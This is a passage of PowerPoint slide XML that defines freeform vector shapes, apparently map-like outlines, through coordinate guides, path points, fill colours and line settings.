                  <a:gd name="T35" fmla="*/ 53 h 84"/>
                  <a:gd name="T36" fmla="*/ 55 w 55"/>
                  <a:gd name="T37" fmla="*/ 52 h 84"/>
                  <a:gd name="T38" fmla="*/ 55 w 55"/>
                  <a:gd name="T39" fmla="*/ 56 h 84"/>
                  <a:gd name="T40" fmla="*/ 53 w 55"/>
                  <a:gd name="T41" fmla="*/ 60 h 84"/>
                  <a:gd name="T42" fmla="*/ 49 w 55"/>
                  <a:gd name="T43" fmla="*/ 67 h 84"/>
                  <a:gd name="T44" fmla="*/ 47 w 55"/>
                  <a:gd name="T45" fmla="*/ 70 h 84"/>
                  <a:gd name="T46" fmla="*/ 45 w 55"/>
                  <a:gd name="T47" fmla="*/ 70 h 84"/>
                  <a:gd name="T48" fmla="*/ 41 w 55"/>
                  <a:gd name="T49" fmla="*/ 68 h 84"/>
                  <a:gd name="T50" fmla="*/ 39 w 55"/>
                  <a:gd name="T51" fmla="*/ 69 h 84"/>
                  <a:gd name="T52" fmla="*/ 35 w 55"/>
                  <a:gd name="T53" fmla="*/ 74 h 84"/>
                  <a:gd name="T54" fmla="*/ 32 w 55"/>
                  <a:gd name="T55" fmla="*/ 73 h 84"/>
                  <a:gd name="T56" fmla="*/ 30 w 55"/>
                  <a:gd name="T57" fmla="*/ 71 h 84"/>
                  <a:gd name="T58" fmla="*/ 26 w 55"/>
                  <a:gd name="T59" fmla="*/ 72 h 84"/>
                  <a:gd name="T60" fmla="*/ 22 w 55"/>
                  <a:gd name="T61" fmla="*/ 74 h 84"/>
                  <a:gd name="T62" fmla="*/ 14 w 55"/>
                  <a:gd name="T63" fmla="*/ 81 h 84"/>
                  <a:gd name="T64" fmla="*/ 10 w 55"/>
                  <a:gd name="T65" fmla="*/ 82 h 84"/>
                  <a:gd name="T66" fmla="*/ 7 w 55"/>
                  <a:gd name="T67" fmla="*/ 84 h 84"/>
                  <a:gd name="T68" fmla="*/ 7 w 55"/>
                  <a:gd name="T69" fmla="*/ 79 h 84"/>
                  <a:gd name="T70" fmla="*/ 6 w 55"/>
                  <a:gd name="T71" fmla="*/ 77 h 84"/>
                  <a:gd name="T72" fmla="*/ 5 w 55"/>
                  <a:gd name="T73" fmla="*/ 70 h 84"/>
                  <a:gd name="T74" fmla="*/ 4 w 55"/>
                  <a:gd name="T75" fmla="*/ 67 h 84"/>
                  <a:gd name="T76" fmla="*/ 5 w 55"/>
                  <a:gd name="T77" fmla="*/ 63 h 84"/>
                  <a:gd name="T78" fmla="*/ 9 w 55"/>
                  <a:gd name="T79" fmla="*/ 59 h 84"/>
                  <a:gd name="T80" fmla="*/ 9 w 55"/>
                  <a:gd name="T81" fmla="*/ 56 h 84"/>
                  <a:gd name="T82" fmla="*/ 10 w 55"/>
                  <a:gd name="T83" fmla="*/ 52 h 84"/>
                  <a:gd name="T84" fmla="*/ 10 w 55"/>
                  <a:gd name="T85" fmla="*/ 51 h 84"/>
                  <a:gd name="T86" fmla="*/ 7 w 55"/>
                  <a:gd name="T87" fmla="*/ 48 h 84"/>
                  <a:gd name="T88" fmla="*/ 7 w 55"/>
                  <a:gd name="T89" fmla="*/ 46 h 84"/>
                  <a:gd name="T90" fmla="*/ 7 w 55"/>
                  <a:gd name="T91" fmla="*/ 41 h 84"/>
                  <a:gd name="T92" fmla="*/ 6 w 55"/>
                  <a:gd name="T93" fmla="*/ 38 h 84"/>
                  <a:gd name="T94" fmla="*/ 4 w 55"/>
                  <a:gd name="T95" fmla="*/ 37 h 84"/>
                  <a:gd name="T96" fmla="*/ 0 w 55"/>
                  <a:gd name="T97" fmla="*/ 37 h 84"/>
                  <a:gd name="T98" fmla="*/ 5 w 55"/>
                  <a:gd name="T99" fmla="*/ 33 h 84"/>
                  <a:gd name="T100" fmla="*/ 7 w 55"/>
                  <a:gd name="T101" fmla="*/ 32 h 84"/>
                  <a:gd name="T102" fmla="*/ 11 w 55"/>
                  <a:gd name="T103" fmla="*/ 34 h 84"/>
                  <a:gd name="T104" fmla="*/ 13 w 55"/>
                  <a:gd name="T105" fmla="*/ 32 h 84"/>
                  <a:gd name="T106" fmla="*/ 13 w 55"/>
                  <a:gd name="T107" fmla="*/ 30 h 84"/>
                  <a:gd name="T108" fmla="*/ 8 w 55"/>
                  <a:gd name="T109" fmla="*/ 22 h 84"/>
                  <a:gd name="T110" fmla="*/ 7 w 55"/>
                  <a:gd name="T111" fmla="*/ 19 h 84"/>
                  <a:gd name="T112" fmla="*/ 6 w 55"/>
                  <a:gd name="T113" fmla="*/ 18 h 84"/>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55"/>
                  <a:gd name="T172" fmla="*/ 0 h 84"/>
                  <a:gd name="T173" fmla="*/ 55 w 55"/>
                  <a:gd name="T174" fmla="*/ 84 h 84"/>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55" h="84">
                    <a:moveTo>
                      <a:pt x="6" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36308" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4709" y="2189"/>
                <a:ext cx="100" cy="113"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 100"/>
                  <a:gd name="T1" fmla="*/ 98 h 113"/>
                  <a:gd name="T2" fmla="*/ 54 w 100"/>
                  <a:gd name="T3" fmla="*/ 99 h 113"/>
                  <a:gd name="T4" fmla="*/ 45 w 100"/>
                  <a:gd name="T5" fmla="*/ 98 h 113"/>
                  <a:gd name="T6" fmla="*/ 38 w 100"/>
                  <a:gd name="T7" fmla="*/ 106 h 113"/>
                  <a:gd name="T8" fmla="*/ 35 w 100"/>
                  <a:gd name="T9" fmla="*/ 110 h 113"/>
                  <a:gd name="T10" fmla="*/ 30 w 100"/>
                  <a:gd name="T11" fmla="*/ 111 h 113"/>
                  <a:gd name="T12" fmla="*/ 25 w 100"/>
                  <a:gd name="T13" fmla="*/ 107 h 113"/>
                  <a:gd name="T14" fmla="*/ 18 w 100"/>
                  <a:gd name="T15" fmla="*/ 113 h 113"/>
                  <a:gd name="T16" fmla="*/ 15 w 100"/>
                  <a:gd name="T17" fmla="*/ 108 h 113"/>
                  <a:gd name="T18" fmla="*/ 8 w 100"/>
                  <a:gd name="T19" fmla="*/ 100 h 113"/>
                  <a:gd name="T20" fmla="*/ 12 w 100"/>
                  <a:gd name="T21" fmla="*/ 94 h 113"/>
                  <a:gd name="T22" fmla="*/ 18 w 100"/>
                  <a:gd name="T23" fmla="*/ 89 h 113"/>
                  <a:gd name="T24" fmla="*/ 17 w 100"/>
                  <a:gd name="T25" fmla="*/ 79 h 113"/>
                  <a:gd name="T26" fmla="*/ 17 w 100"/>
                  <a:gd name="T27" fmla="*/ 73 h 113"/>
                  <a:gd name="T28" fmla="*/ 11 w 100"/>
                  <a:gd name="T29" fmla="*/ 70 h 113"/>
                  <a:gd name="T30" fmla="*/ 6 w 100"/>
                  <a:gd name="T31" fmla="*/ 72 h 113"/>
                  <a:gd name="T32" fmla="*/ 1 w 100"/>
                  <a:gd name="T33" fmla="*/ 68 h 113"/>
                  <a:gd name="T34" fmla="*/ 2 w 100"/>
                  <a:gd name="T35" fmla="*/ 61 h 113"/>
                  <a:gd name="T36" fmla="*/ 9 w 100"/>
                  <a:gd name="T37" fmla="*/ 53 h 113"/>
                  <a:gd name="T38" fmla="*/ 28 w 100"/>
                  <a:gd name="T39" fmla="*/ 43 h 113"/>
                  <a:gd name="T40" fmla="*/ 37 w 100"/>
                  <a:gd name="T41" fmla="*/ 28 h 113"/>
                  <a:gd name="T42" fmla="*/ 43 w 100"/>
                  <a:gd name="T43" fmla="*/ 26 h 113"/>
                  <a:gd name="T44" fmla="*/ 48 w 100"/>
                  <a:gd name="T45" fmla="*/ 33 h 113"/>
                  <a:gd name="T46" fmla="*/ 59 w 100"/>
                  <a:gd name="T47" fmla="*/ 34 h 113"/>
                  <a:gd name="T48" fmla="*/ 62 w 100"/>
                  <a:gd name="T49" fmla="*/ 31 h 113"/>
                  <a:gd name="T50" fmla="*/ 59 w 100"/>
                  <a:gd name="T51" fmla="*/ 20 h 113"/>
                  <a:gd name="T52" fmla="*/ 64 w 100"/>
                  <a:gd name="T53" fmla="*/ 17 h 113"/>
                  <a:gd name="T54" fmla="*/ 69 w 100"/>
                  <a:gd name="T55" fmla="*/ 19 h 113"/>
                  <a:gd name="T56" fmla="*/ 78 w 100"/>
                  <a:gd name="T57" fmla="*/ 17 h 113"/>
                  <a:gd name="T58" fmla="*/ 86 w 100"/>
                  <a:gd name="T59" fmla="*/ 5 h 113"/>
                  <a:gd name="T60" fmla="*/ 91 w 100"/>
                  <a:gd name="T61" fmla="*/ 0 h 113"/>
                  <a:gd name="T62" fmla="*/ 96 w 100"/>
                  <a:gd name="T63" fmla="*/ 6 h 113"/>
                  <a:gd name="T64" fmla="*/ 100 w 100"/>
                  <a:gd name="T65" fmla="*/ 14 h 113"/>
                  <a:gd name="T66" fmla="*/ 87 w 100"/>
                  <a:gd name="T67" fmla="*/ 28 h 113"/>
                  <a:gd name="T68" fmla="*/ 87 w 100"/>
                  <a:gd name="T69" fmla="*/ 36 h 113"/>
                  <a:gd name="T70" fmla="*/ 85 w 100"/>
                  <a:gd name="T71" fmla="*/ 48 h 113"/>
                  <a:gd name="T72" fmla="*/ 77 w 100"/>
                  <a:gd name="T73" fmla="*/ 51 h 113"/>
                  <a:gd name="T74" fmla="*/ 68 w 100"/>
                  <a:gd name="T75" fmla="*/ 61 h 113"/>
                  <a:gd name="T76" fmla="*/ 60 w 100"/>
                  <a:gd name="T77" fmla="*/ 63 h 113"/>
                  <a:gd name="T78" fmla="*/ 54 w 100"/>
                  <a:gd name="T79" fmla="*/ 67 h 113"/>
                  <a:gd name="T80" fmla="*/ 50 w 100"/>
                  <a:gd name="T81" fmla="*/ 78 h 113"/>
                  <a:gd name="T82" fmla="*/ 60 w 100"/>
                  <a:gd name="T83" fmla="*/ 89 h 113"/>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100"/>
                  <a:gd name="T127" fmla="*/ 0 h 113"/>
                  <a:gd name="T128" fmla="*/ 100 w 100"/>
                  <a:gd name="T129" fmla="*/ 113 h 113"/>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100" h="113">
                    <a:moveTo>
                      <a:pt x="63" y="92"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="92"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36309" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4709" y="2189"/>
                <a:ext cx="100" cy="113"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 100"/>
                  <a:gd name="T1" fmla="*/ 98 h 113"/>
                  <a:gd name="T2" fmla="*/ 54 w 100"/>
                  <a:gd name="T3" fmla="*/ 99 h 113"/>
                  <a:gd name="T4" fmla="*/ 45 w 100"/>
                  <a:gd name="T5" fmla="*/ 98 h 113"/>
                  <a:gd name="T6" fmla="*/ 38 w 100"/>
                  <a:gd name="T7" fmla="*/ 106 h 113"/>
                  <a:gd name="T8" fmla="*/ 35 w 100"/>
                  <a:gd name="T9" fmla="*/ 110 h 113"/>
                  <a:gd name="T10" fmla="*/ 30 w 100"/>
                  <a:gd name="T11" fmla="*/ 111 h 113"/>
                  <a:gd name="T12" fmla="*/ 25 w 100"/>
                  <a:gd name="T13" fmla="*/ 107 h 113"/>
                  <a:gd name="T14" fmla="*/ 18 w 100"/>
                  <a:gd name="T15" fmla="*/ 113 h 113"/>
                  <a:gd name="T16" fmla="*/ 15 w 100"/>
                  <a:gd name="T17" fmla="*/ 108 h 113"/>
                  <a:gd name="T18" fmla="*/ 8 w 100"/>
                  <a:gd name="T19" fmla="*/ 100 h 113"/>
                  <a:gd name="T20" fmla="*/ 12 w 100"/>
                  <a:gd name="T21" fmla="*/ 94 h 113"/>
                  <a:gd name="T22" fmla="*/ 18 w 100"/>
                  <a:gd name="T23" fmla="*/ 89 h 113"/>
                  <a:gd name="T24" fmla="*/ 17 w 100"/>
                  <a:gd name="T25" fmla="*/ 79 h 113"/>
                  <a:gd name="T26" fmla="*/ 17 w 100"/>
                  <a:gd name="T27" fmla="*/ 73 h 113"/>
                  <a:gd name="T28" fmla="*/ 11 w 100"/>
                  <a:gd name="T29" fmla="*/ 70 h 113"/>
                  <a:gd name="T30" fmla="*/ 6 w 100"/>
                  <a:gd name="T31" fmla="*/ 72 h 113"/>
                  <a:gd name="T32" fmla="*/ 1 w 100"/>
                  <a:gd name="T33" fmla="*/ 68 h 113"/>
                  <a:gd name="T34" fmla="*/ 2 w 100"/>
                  <a:gd name="T35" fmla="*/ 61 h 113"/>
                  <a:gd name="T36" fmla="*/ 9 w 100"/>
                  <a:gd name="T37" fmla="*/ 53 h 113"/>
                  <a:gd name="T38" fmla="*/ 28 w 100"/>
                  <a:gd name="T39" fmla="*/ 43 h 113"/>
                  <a:gd name="T40" fmla="*/ 37 w 100"/>
                  <a:gd name="T41" fmla="*/ 28 h 113"/>
                  <a:gd name="T42" fmla="*/ 43 w 100"/>
                  <a:gd name="T43" fmla="*/ 26 h 113"/>
                  <a:gd name="T44" fmla="*/ 48 w 100"/>
                  <a:gd name="T45" fmla="*/ 33 h 113"/>
                  <a:gd name="T46" fmla="*/ 59 w 100"/>
                  <a:gd name="T47" fmla="*/ 34 h 113"/>
                  <a:gd name="T48" fmla="*/ 62 w 100"/>
                  <a:gd name="T49" fmla="*/ 31 h 113"/>
                  <a:gd name="T50" fmla="*/ 59 w 100"/>
                  <a:gd name="T51" fmla="*/ 20 h 113"/>
                  <a:gd name="T52" fmla="*/ 64 w 100"/>
                  <a:gd name="T53" fmla="*/ 17 h 113"/>
                  <a:gd name="T54" fmla="*/ 69 w 100"/>
                  <a:gd name="T55" fmla="*/ 19 h 113"/>
                  <a:gd name="T56" fmla="*/ 78 w 100"/>
                  <a:gd name="T57" fmla="*/ 17 h 113"/>
                  <a:gd name="T58" fmla="*/ 86 w 100"/>
                  <a:gd name="T59" fmla="*/ 5 h 113"/>
                  <a:gd name="T60" fmla="*/ 91 w 100"/>
                  <a:gd name="T61" fmla="*/ 0 h 113"/>
                  <a:gd name="T62" fmla="*/ 96 w 100"/>
                  <a:gd name="T63" fmla="*/ 6 h 113"/>
                  <a:gd name="T64" fmla="*/ 100 w 100"/>
                  <a:gd name="T65" fmla="*/ 14 h 113"/>
                  <a:gd name="T66" fmla="*/ 87 w 100"/>
                  <a:gd name="T67" fmla="*/ 28 h 113"/>
                  <a:gd name="T68" fmla="*/ 87 w 100"/>
                  <a:gd name="T69" fmla="*/ 36 h 113"/>
                  <a:gd name="T70" fmla="*/ 85 w 100"/>
                  <a:gd name="T71" fmla="*/ 48 h 113"/>
                  <a:gd name="T72" fmla="*/ 77 w 100"/>
                  <a:gd name="T73" fmla="*/ 51 h 113"/>
                  <a:gd name="T74" fmla="*/ 68 w 100"/>
                  <a:gd name="T75" fmla="*/ 61 h 113"/>
                  <a:gd name="T76" fmla="*/ 60 w 100"/>
                  <a:gd name="T77" fmla="*/ 63 h 113"/>
                  <a:gd name="T78" fmla="*/ 54 w 100"/>
                  <a:gd name="T79" fmla="*/ 67 h 113"/>
                  <a:gd name="T80" fmla="*/ 50 w 100"/>
                  <a:gd name="T81" fmla="*/ 78 h 113"/>
                  <a:gd name="T82" fmla="*/ 60 w 100"/>
                  <a:gd name="T83" fmla="*/ 89 h 113"/>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100"/>
                  <a:gd name="T127" fmla="*/ 0 h 113"/>
                  <a:gd name="T128" fmla="*/ 100 w 100"/>
                  <a:gd name="T129" fmla="*/ 113 h 113"/>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100" h="113">
                    <a:moveTo>
                      <a:pt x="63" y="92"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
